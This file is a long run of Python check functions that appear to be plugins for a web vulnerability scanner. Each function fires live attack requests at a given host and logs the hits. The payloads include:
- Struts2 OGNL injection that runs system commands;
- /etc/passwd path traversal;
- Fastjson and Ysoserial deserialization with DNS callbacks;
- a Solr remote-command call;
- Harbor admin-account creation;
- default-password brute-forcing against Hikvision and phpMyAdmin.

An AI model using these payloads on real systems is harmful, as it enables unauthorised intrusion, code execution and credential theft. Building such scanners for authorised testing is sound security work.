def check(host, port=5601): scheme = 'https' if '443' in str(port) else 'http' target = '{}://{}:{}'.format(scheme, host, port) uris = [ '/elasticsearch/404adqweqw/_mapping/field/*?_=1569226048367&ignore_unavailable=false&allow_no_indices=false&include_defaults=true', '/api/saved_objects/_find?type=index-pattern&fields=title&per_page=10' ] hits = ['"type":"index_not_found_exception","reason', '"saved_objects":['] try: targets = ['{}{}'.format(target, uri) for uri in uris] requests.packages.urllib3.disable_warnings() with requests.Session() as session: for target in targets: response = session.get(target, timeout=7, verify=False) for hit in hits: if hit in response.text and response.status_code in [ 404, 200 ]: output = response.json() insert_vuln_db(host, target, output, plugin_id) return True, host, target, output except Exception as error: return False return False
def check(host, port=80): scheme = 'https' if '443' in str(port) else 'http' target = '{}://{}:{}'.format(scheme, host, port) uris = [ '/doc.pdf', '/help.pdf', '/wendang.pdf', '/api.pdf', '/web.pdf', '/dev.pdf', '/bangzhu.pdf', '/kaifa.pdf', '/帮助.pdf', '/说明.pdf', '/手册.pdf' ] hits = ['application/pdf'] try: targets = ['{}{}'.format(target, uri) for uri in uris] requests.packages.urllib3.disable_warnings() with requests.Session() as session: for target in targets: response = session.head(target, timeout=7, verify=False) for hit in hits: if hit in str(response.headers.get( 'content-type')) and response.status_code in [200]: output = response.headers insert_vuln_db(host, target, output, plugin_id) return True, host, target, output except Exception as error: return False return False
def check(host, port=80): scheme = 'https' if '443' in str(port) else 'http' target = '{}://{}:{}'.format(scheme, host, port) uris = ['/api/users'] hits = ['', 'username has already been used!'] data = { "username": "******", "email": "*****@*****.**", "realname": "opsbiu", "password": "******", "comment": "12", "has_admin_role": True } try: targets = ['{}{}'.format(target, uri) for uri in uris] requests.packages.urllib3.disable_warnings() with requests.Session() as session: for target in targets: response = session.post(target, json=data, timeout=7, verify=False) for hit in hits: if hit in response.text and response.status_code in [ 201, 409 ]: output = data insert_vuln_db(host, target, output, plugin_id) return True, host, target, output except Exception as error: return False return False
def check(host, port=80): scheme = 'https' if '443' in str(port) else 'http' target = '{}://{}:{}'.format(scheme, host, port) try: if not is_hikvision(target): return False target = '{}/PSIA/Custom/SelfExt/userCheck'.format(target) users = ['admin'] passwords = ['12345', '123456', '1234567', '00000'] requests.packages.urllib3.disable_warnings() with requests.Session() as session: for password in passwords: for user in users: response = session.get(target, timeout=7, verify=False, auth=(user, password)) if '<statusValue>200</statusValue>' in response.text: output = '用户名:{}\t密码:{}\n{}'.format( user, password, response.text) insert_vuln_db(host, target, output, plugin_id) return True, host, target, output except: return False return False
def check(host, port=80): scheme = 'https' if '443' in str(port) else 'http' target = '{}://{}:{}'.format(scheme, host, port) uris = [ '/index.php?action=login.index&host=0', '/rockmongo/index.php?action=login.index&host=0' ] hits = ['root:x:0'] headers = {} headers[ 'Cookie'] = 'ROCK_LANG=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00' try: targets = ['{}{}'.format(target, uri) for uri in uris] requests.packages.urllib3.disable_warnings() with requests.Session() as session: for target in targets: response = session.get(target, headers=headers, timeout=7, verify=False) for hit in hits: if hit in response.text: output = response.text insert_vuln_db(host, target, output, plugin_id) return True, host, target, output except Exception as error: return False return False
def check(host, port=80): scheme = 'https' if '443' in str(port) else 'http' target = '{}://{}:{}'.format(scheme, host, port) uris = [ '/?debug=browser&object=(%[email protected]@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=netstat%20-an' ] hits = [ 'Active Connections', 'Active Internet connections', 'ESTABLISHED', 'CLOSE_WAIT', 'TIME_WAIT' ] try: targets = ['{}{}'.format(target, uri) for uri in uris] requests.packages.urllib3.disable_warnings() with requests.Session() as session: for target in targets: response = session.get(target, timeout=10, verify=False) for hit in hits: if hit in response.text: output = response.text insert_vuln_db(host, target, output, plugin_id) return True, host, target, output except Exception as error: return False return False
def check(host, port=80): scheme = 'https' if '443' in str(port) else 'http' target = '{}://{}:{}'.format(scheme, host, port) uris = [ '/plugins/servlet/gadgets/makeRequest?url={}://{}:{}@'.format( scheme, host, port) ] hits = ['java.lang.IllegalArgumentException: Host name may not be null'] headers = {'X-Atlassian-Token': 'no-check'} try: targets = ['{}{}'.format(target, uri) for uri in uris] requests.packages.urllib3.disable_warnings() with requests.Session() as session: for target in targets: response = session.get(target, timeout=25, headers=headers, verify=False) for hit in hits: if hit in response.text: output = response.text insert_vuln_db(host, target, output, plugin_id) return True, host, target, output except Exception as error: return False return False
def check(host, port=443): scheme = 'https' if '443' in str(port) else 'http' target = '{}://{}:{}'.format(scheme, host, port) subdomain, payload_dns = get_dns_payload() uris = [ '/3.0/authService/config', '/2.0/authService/config', '/1.0/authService/config' ] payload = { "c": { "@type": "java.net.InetAddress", "val": payload_dns }, "b": {} } try: with requests.Session() as session: requests.packages.urllib3.disable_warnings() targets = ['{}{}'.format(target, uri) for uri in uris] for target in targets: try: session.post(target, json=payload, timeout=5, verify=False) except: pass finally: if have_record(subdomain): insert_vuln_db(host, target, payload_dns, plugin_id) return True, host, target, payload_dns return False except: return False
def check(host, port=80): scheme = 'https' if '443' in str(port) else 'http' target = '{}://{}:{}'.format(scheme, host, port) uris = ['/index.php?action=login.index'] hits = ['server.createDatabase'] data = "more=0&host=0&username=admin&password=admin&db=&lang=zh_cn&expire=3" headers = {} headers['Content-Type'] = 'application/x-www-form-urlencoded' try: targets = ['{}{}'.format(target, uri) for uri in uris] requests.packages.urllib3.disable_warnings() with requests.Session() as session: for target in targets: response = session.post(target, headers=headers, data=data, timeout=7, verify=False) for hit in hits: if hit in response.text: output = response.text insert_vuln_db(host, target, output, plugin_id) return True, host, target, output except Exception as error: return False return False
def check(host, port=6379): try: with socket.create_connection((host, port), timeout=5) as conn: conn.send(b"INFO\r\n") response = str(conn.recv(2048), 'utf-8', 'ignore') if 'redis_version' in response: target = "{}:{}".format(host, port) insert_vuln_db(host, target, "", plugin_id) return True, host, target, response elif "Authentication" in response: return False except: return False
def check(host, port=80): scheme = 'https' if '443' in str(port) else 'http' target = '{}://{}:{}'.format(scheme, host, port) urls = [target, '{}/phpmyadmin/index.php'.format(target)] try: for url in urls: if not is_phpmyadmin(url): continue simple_passwords = [ '', '123', '1234', '12345', '123456', '!@#', '1111', '111', '666', '1314' ] simple_users = [ '', 'root', 'test', 'admin', 'server', 'password', 'mysql', 'ceshi', 'mima', host.split('.')[0] ] passwords = [ '{}{}'.format(user, password) for user in simple_users for password in simple_passwords ] for user in ['root', 'test', 'server', 'ceshi']: for pwd in passwords: token = get_token(url) if not token: return False data = { "pma_username": user, "pma_password": pwd, "server": 1, "token": token } requests.packages.urllib3.disable_warnings() response = requests.post( url, data, timeout=7, headers={'Cookie': "pma_lang=zh_CN"}) if 'login_form' in response.text: continue elif response.status_code == 200 and 'db_structure.php' in response.text: output = "用户名:{}\t 密码:{}".format(user, pwd) target = url insert_vuln_db(host, target, output, plugin_id) return True, host, target, output except: return False return False
def check(host, port=5901): target = '{}:{}'.format(host, port) try: result, vnc = check_anonymous(host, port) if result: code, msg = vnc.auth("None") vnc.disconnect() if code == 0: output = '开启匿名访问' insert_vuln_db(host, target, output, plugin_id) return True, host, target, output except: return False return False
def check(host, port=80): scheme = 'https' if '443' in str(port) else 'http' target = '{}://{}:{}/invoker/readonly'.format(scheme, host, port) payload_str, payload_dns = new_dns_payload() payload = Ysoserial().generate(payload='JRMPClient', command=payload_dns) try: requests.post(target, data=payload, timeout=10) except: pass results = have_records(payload_str) if results: output = payload_str insert_vuln_db(host, target, output, plugin_id) return True, host, target, output return False
def check(host, port=80): scheme = 'https' if '443' in str(port) else 'http' target = '{}://{}:{}'.format(scheme, host, port) url = '{}/index.php/component/users'.format(target) check_string = random_string(20) hit = check_string try: response = make_req(url, gen_pay('print_r', check_string)) if hit in response: output = '验证字符串: {}\n请求响应: {}'.format(hit, response) insert_vuln_db(host, target, output, plugin_id) return True, host, target, output except Exception as error: return False return False
def check(host, port=80): scheme = 'https' if '443' in str(port) else 'http' target = '{}://{}:{}'.format(scheme, host, port) uris = ['/api/project/swagger_url?url=http://www.baidu.com'] try: targets = ['{}{}'.format(target, uri) for uri in uris] requests.packages.urllib3.disable_warnings() with requests.Session() as session: for target in targets: response = session.get(target, timeout=7, verify=False) if '{"errcode":40011,"errmsg":"请登录...","data":null}' in response.text: output = response.text insert_vuln_db(host, target, output, plugin_id) return True, host, target, output except Exception as error: return False return False
def check(host, port=80): scheme = 'https' if '443' in str(port) else 'http' target = '{}://{}:{}'.format(scheme, host, port) timestamp = int(time.time()) target = '{}/{}.txt'.format(target, timestamp) try: file_content = '{}-{}'.format(random.random(), timestamp) requests.packages.urllib3.disable_warnings() requests.put(target, json={'data': file_content}, timeout=7) response = requests.get(target, timeout=7) if response.text == file_content: output = '目标开启 http PUT' insert_vuln_db(host, target, output, plugin_id) return True, host, target, output else: return False except: return False
def check(host, port=80): scheme = 'https' if '443' in str(port) else 'http' target = '{}://{}:{}'.format(scheme, host, port) uris = [ "/foo/default/master/..%252F..%252F..%252F..%252F..%252F..%252Fetc%252fpasswd"] try: targets = ['{}{}'.format(target, uri) for uri in uris] requests.packages.urllib3.disable_warnings() with requests.Session() as session: for target in targets: response = session.get(target, timeout=7, verify=False) if 'root:x:0' in response.text: output = '/etc/passwd文件内容:\n{}'.format(response.text) insert_vuln_db(host, target, output, plugin_id) return True, host, target, output except Exception as error: return False return False
def check(host, port=80): scheme = 'https' if '443' in str(port) else 'http' target = '{}://{}:{}'.format(scheme, host, port) log_files = [ 'debug.log', 'web.log', 'app.log', 'init.log', 'test.log', 'install.log', 'api.log', 'access.log', 'user.log', 'deploy.log', 'error.log', 'npm-debug.log' ] php_paths = ['app/', 'application/', 'log/', ''] uris = [ '/{}{}'.format(php_path, log_file) for php_path in php_paths for log_file in log_files ] try: requests.packages.urllib3.disable_warnings() targets = ['{}{}'.format(target, uri) for uri in uris] check_error_response = requests.head( '{}/loadg/biu404.log'.format(target), timeout=7) if check_error_response.status_code != 200: with requests.Session() as session: for target in targets: response = session.head(target, timeout=7) if response.status_code in [ 200, 301, 302 ] and response.url == target and session.head( target.replace('.log', '/abc.log'), timeout=7).status_code not in [200, 301, 302]: response = session.get(target, timeout=7) content_type = str( response.headers.get('Content-Type')) + ( response.headers.get('content-type')) if response.headers.get( 'Content-Length' ) > 10 and '<div' not in response.text.lower( ) and 'html>' not in response.text and 'json' not in content_type and 'html' not in content_type: output = response.text insert_vuln_db(host, target, output, plugin_id) return True, host, target, output except: return False return False
def check(host, port=80): scheme = 'https' if '443' in str(port) else 'http' target = '{}://{}:{}'.format(scheme, host, port) uris = ['/jolokia/list', '/actuator/jolokia/list'] try: targets = ['{}{}'.format(target, uri) for uri in uris] requests.packages.urllib3.disable_warnings() with requests.Session() as session: for target in targets: response = session.head(target, timeout=7) if response.status_code in [302, 200]: response = session.get(target, timeout=7) if 'ch.qos.logback.classic.jmx.JMXConfigurator' in response.text: output = response.text insert_vuln_db(host, target, output, plugin_id) return True, host, target, output except Exception as error: return False return False
def check(host, port=80): scheme = 'https' if '443' in str(port) else 'http' target = '{}://{}:{}'.format(scheme, host, port) uris = ["/composer.lock"] try: targets = ['{}{}'.format(target, uri) for uri in uris] requests.packages.urllib3.disable_warnings() with requests.Session() as session: for target in targets: response = session.get(target, timeout=7) if 'name' in response.json().get('packages')[0].keys(): check_result = checkLock(response.json()) if len(check_result): output = check_result insert_vuln_db(host, target, output, plugin_id) return True, host, target, output except Exception as error: return False return False
def check(host, port=10250): scheme = 'https' target = '{}://{}:{}'.format(scheme, host, port) uris = ['/runningpods'] hits = ['"kind":"PodList"'] try: targets = ['{}{}'.format(target, uri) for uri in uris] requests.packages.urllib3.disable_warnings() with requests.Session() as session: for target in targets: response = session.get(target, timeout=7, verify=False) for hit in hits: if hit in response.text and response.status_code in [200]: output = response.json() insert_vuln_db(host, target, output, plugin_id) return True, host, target, output except Exception as error: return False return False
def check(host, port=80): scheme = 'https' if '443' in str(port) else 'http' target = '{}://{}:{}'.format(scheme, host, port) uris = ['/nuxeo/login.jsp/${233*2333}.xhtml'] hits = ['543589'] try: targets = ['{}{}'.format(target, uri) for uri in uris] requests.packages.urllib3.disable_warnings() with requests.Session() as session: for target in targets: response = session.get(target, timeout=7, verify=False) for hit in hits: if hit in response.text: output = response.text insert_vuln_db(host, target, output, plugin_id) return True, host, target, output except Exception as error: return False return False
def check(host, port=80): scheme = 'https' if '443' in str(port) else 'http' target = '{}://{}:{}'.format(scheme, host, port) hits = ['solr-webapp'] try: uris = get_cores(host, port) if len(uris): targets = ['{}{}'.format(target, uri) for uri in uris] for target in targets: config(target) response = rce(target, 'dir') for hit in hits: if hit in response.text: output = response.text insert_vuln_db(host, target, target, plugin_id) return True, host, target, output except Exception as error: return False return False
def check(host, port=80): scheme = 'https' if '443' in str(port) else 'http' target = '{}://{}:{}'.format(scheme, host, port) uris = ['/?a=display&templateFile=README.md'] hits = ['ThinkCMF是一款'] try: targets = ['{}{}'.format(target, uri) for uri in uris] requests.packages.urllib3.disable_warnings() with requests.Session() as session: for target in targets: response = session.get(target, timeout=7, verify=False) for hit in hits: if hit in response.text and response.status_code in [200]: output = response.text insert_vuln_db(host, target, output, plugin_id) return True, host, target, output except Exception as error: return False return False
def check(host, port=80): scheme = 'https' if '443' in str(port) else 'http' target = '{}://{}:{}'.format(scheme, host, port) uris = ['/WEB-INF/web.xml'] hits = ['</web-app>', '</servlet-mapping>'] try: targets = ['{}{}'.format(target, uri) for uri in uris] requests.packages.urllib3.disable_warnings() with requests.Session() as session: for target in targets: response = session.get(target, timeout=7, verify=False) for hit in hits: if hit in response.text and response.status_code in [200]: output = response.text insert_vuln_db(host, target, output, plugin_id) return True, host, target, output except Exception as error: return False return False
def check(host, port=80): scheme = 'https' if '443' in str(port) else 'http' target = '{}://{}:{}'.format(scheme, host, port) subdomain, payload_dns = get_dns_payload() uris = ['/', '/api', '/api/login', '/api/log', '/log'] payload = {"@type": "java.net.InetAddress", "val": payload_dns} try: requests.packages.urllib3.disable_warnings() with requests.Session() as session: targets = ['{}{}'.format(target, uri) for uri in uris] for url in targets: session.post(url, json=payload, timeout=30, verify=False) if have_record(subdomain): insert_vuln_db(host, target, payload_dns, plugin_id) except: return False
def check(host, port=5984): scheme = 'https' if '443' in str(port) else 'http' target = '{}://{}:{}'.format(scheme, host, port) uris = ['/_session'] hits = ['"roles":["_admin"]}'] try: targets = ['{}{}'.format(target, uri) for uri in uris] requests.packages.urllib3.disable_warnings() with requests.Session() as session: for target in targets: response = session.get(target, timeout=7, verify=False) for hit in hits: if hit in response.text and response.status_code in [200]: output = response.json() insert_vuln_db(host, target, "", plugin_id) return True, host, target, output except Exception as error: return False return False
def check(host, port=80): scheme = 'https' if '443' in str(port) else 'http' target = '{}://{}:{}'.format(scheme, host, port) hits = ['biuframework'] try: targets = [target] headers = {"Content-Type": "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#[email protected]@getResponse().getWriter()).(#o.println('biu'+'framework')).(#o.close())}"} #requests.packages.urllib3.disable_warnings() with requests.Session() as session: for target in targets: response = session.get(target, timeout=10, verify=False, headers=headers) for hit in hits: if hit in response.text: output = response.text insert_vuln_db(host, target, output, plugin_id) return True, host, target, output except Exception as error: return False return False
def check(host, port=80): scheme = 'https' if '443' in str(port) else 'http' target = '{}://{}:{}'.format(scheme, host, port) uris = ['/general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20'] hits = ['SQL语句'] try: targets = ['{}{}'.format(target, uri) for uri in uris] requests.packages.urllib3.disable_warnings() with requests.Session() as session: for target in targets: response = session.get(target, timeout=7, verify=False) for hit in hits: if hit in response.text: output = response.text insert_vuln_db(host, target, output, plugin_id) return True, host, target, output except Exception as error: return False return False
def check(host, port=80): scheme = 'https' if '443' in str(port) else 'http' target = '{}://{}:{}'.format(scheme, host, port) uris = ['/phpmyadmin', '/database', '/pma', '/db', '/mysql', '/console'] hits = ['PMA_commonParams', 'PMA_sendHeaderLocation'] try: targets = ['{}{}'.format(target, uri) for uri in uris] requests.packages.urllib3.disable_warnings() with requests.Session() as session: for target in targets: response = session.get(target, timeout=7, verify=False) for hit in hits: if hit in response.text: output = response.text insert_vuln_db(host, target, output, plugin_id) return True, host, target, output except Exception as error: return False return False